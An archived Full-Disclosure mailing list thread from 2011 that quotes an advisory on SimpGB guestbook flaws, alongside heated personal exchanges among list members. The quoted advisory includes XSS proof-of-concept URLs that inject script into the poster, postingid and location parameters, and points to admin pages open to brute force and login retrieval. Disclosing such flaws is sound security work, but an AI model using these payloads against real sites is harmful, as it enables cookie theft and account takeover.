| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 7 Feb 2011 07:00:58 +0000 From: "Cal Leeming [Simplicity Media Ltd]" <cal.leeming@...plicitymedialtd.co.uk> To: laurent.gaffie@...il.com Cc: full-disclosure@...ts.grok.org.uk, MustLive <mustlive@...security.com.ua> Subject: Re: Multiple vulnerabilities in SimpGB I think it's time for a group hug :| On Sun, Feb 6, 2011 at 10:43 AM, Michele Orru <antisnatchor@...il.com>wrote: > ahaah. > Nice reply Sparky. > MustLive, seems you've been defaced :-) > > antisnatchor > > ------------------------------ > > laurent gaffie <laurent.gaffie@...il.com> > February 5, 2011 3:36 AM > > Hey Sparky, > > One of the many many thing you didn't understand during the past 5 years is > that you should probably try to identify and fix your stuff on *your* > website, before spamming this ML with your crap. > cf: > http://www.zone-h.org/mirror/id/11367858 > > e-tard. > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ------------------------------ > > MustLive <mustlive@...security.com.ua> > February 4, 2011 10:49 PM > > Hello Laurent! > > You are very "intelligent" man, as I see from this and previous your letter > (in 2010). > > You need to take into account the next: > > 1. I know better where to send. > > 2. If you write shitty stuff, then it doesn't mean that other do the same. > > 3. No need to think and state instead of other people - if it's not > interesting for you, then it can be interesting for others. > > 4. The main and obvious thing it's that I write all my advisories from 2006 > for those people who are interested in them (and there are such people, as > I > know for sure). So if you or anybody else is not interested in them, just > skip them (and don't need to write me nonsenses) - I'm writing my letters > not for you, but for others who is interested in them and who thanks me for > my work. It's strange that such "intelligent" man as you didn't understand > it for last five years :-). > > 5. I don't need any not serious letters from you, so don't waste your time > writing me anymore, because I've put your e-mail into blacklist. Spend your > time for good things. > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > http://websecurity.com.ua > > ----- Original Message ----- > From: laurent gaffie > To: MustLive > Cc: full-disclosure@...ts.grok.org.uk ; bugtraq@...urityfocus.com > Sent: Wednesday, January 26, 2011 5:09 PM > Subject: Re: [Full-disclosure] Multiple vulnerabilities in SimpGB > > > Send your shitty stuff to bugtraq@...urityfocus.com > > If it's not obvious, no one give a shit here, seriously. > > > > 2011/1/27 MustLive <mustlive@...security.com.ua><mustlive@...security.com.ua> > > Hello list! > > I want to warn you about Cross-Site Scripting, Brute Force, Insufficient > Anti-automation and Abuse of Functionality vulnerabilities in SimpGB. > > ------------------------- > Affected products: > ------------------------- > > Vulnerable are SimpGB v1.49.02 and previous versions. > > ---------- > Details: > ---------- > > XSS (WASC-08): > > POST request at page http://site/guestbook.php in parameters poster, > postingid and location in Preview function. If captcha is using in > guestbook, then working code of the captcha is required for the attack. Or > via GET request: > > > http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview > > > http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview > > > http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview > > Brute Force (WASC-11): > > http://site/admin/index.php > > Insufficient Anti-automation (WASC-21): > > http://site/admin/pwlost.php > > In this functionality there is no protection from automated requests > (captcha). > > Abuse of Functionality (WASC-42): > > http://site/admin/pwlost.php > > In this functionality it's possible to retrieve logins. > > ------------ > Timeline: > ------------ > > 2010.11.17 - announced at my site. > 2010.11.19 - informed developers. > 2011.01.25 - disclosed at my site. > > I mentioned about these vulnerabilities at my site > (http://websecurity.com.ua/4690/). > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > http://websecurity.com.ua > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ------------------------------ > > laurent gaffie <laurent.gaffie@...il.com> > January 26, 2011 4:09 PM > > Send your shitty stuff to bugtraq@...urityfocus.com > > If it's not obvious, no one give a shit here, seriously. > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ------------------------------ > > MustLive <mustlive@...security.com.ua> > January 26, 2011 3:15 PM > > Hello list! > > I want to warn you about Cross-Site Scripting, Brute Force, Insufficient > Anti-automation and Abuse of Functionality vulnerabilities in SimpGB. > > ------------------------- > Affected products: > ------------------------- > > Vulnerable are SimpGB v1.49.02 and previous versions. > > ---------- > Details: > ---------- > > XSS (WASC-08): > > POST request at page http://site/guestbook.php in parameters poster, > postingid and location in Preview function. If captcha is using in > guestbook, then working code of the captcha is required for the attack. Or > via GET request: > > > http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview > > > http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview > > > http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview > > Brute Force (WASC-11): > > http://site/admin/index.php > > Insufficient Anti-automation (WASC-21): > > http://site/admin/pwlost.php > > In this functionality there is no protection from automated requests > (captcha). > > Abuse of Functionality (WASC-42): > > http://site/admin/pwlost.php > > In this functionality it's possible to retrieve logins. > > ------------ > Timeline: > ------------ > > 2010.11.17 - announced at my site. > 2010.11.19 - informed developers. > 2011.01.25 - disclosed at my site. > > I mentioned about these vulnerabilities at my site > (http://websecurity.com.ua/4690/). > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > http://websecurity.com.ua > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > Content of type "text/html" skipped Download attachment "compose-unknown-contact.jpg" of type "image/jpeg" (1421 bytes) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists